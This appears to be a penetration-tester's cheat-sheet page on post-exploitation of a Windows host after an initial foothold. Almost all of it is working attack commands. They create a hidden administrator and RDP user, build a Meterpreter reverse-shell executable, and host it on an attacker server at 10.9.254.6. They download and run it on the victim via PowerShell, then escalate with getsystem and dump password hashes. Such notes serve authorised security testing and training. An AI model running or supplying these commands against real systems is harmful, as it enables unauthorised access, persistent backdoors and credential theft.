Add RDP Account & Ride on Meterpreter

with initial foothold

Remote Desktop

net user pentest Pen.TE$t2024!1 /ADD
net localgroup "Remote Desktop Users" pentest /add
net localgroup "Administrators" pentest /add

Meterpreter

Payload generation

https://www.offsec.com/metasploit-unleashed/generating-payloads/

use payload/windows/meterpreter/reverse_tcp 
set lhost=10.9.254.6 
set lport=8888
generate -f exe -o /var/www/html/meterpreter.exe

Metasploit listener for meterpreter payload

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.9.254.6
set lport 8888
run

Transfer meterpreter.exe

apache2ctl start

Connect via RDP to the victim and start powershell

$URL="http://10.9.254.6/meterpreter.exe"
$Path="C:\Users\pentest\meterpreter.exe"

Invoke-WebRequest -URI $URL -OutFile $Path

Run meterpreter.exe

Start meterpreter.exe "As Administrator"

Getsystem & hashdump

meterpreter> getsystem
meterpreter> hashdump
PreviousPowershell PayloadsNextDump File Analysis

Last updated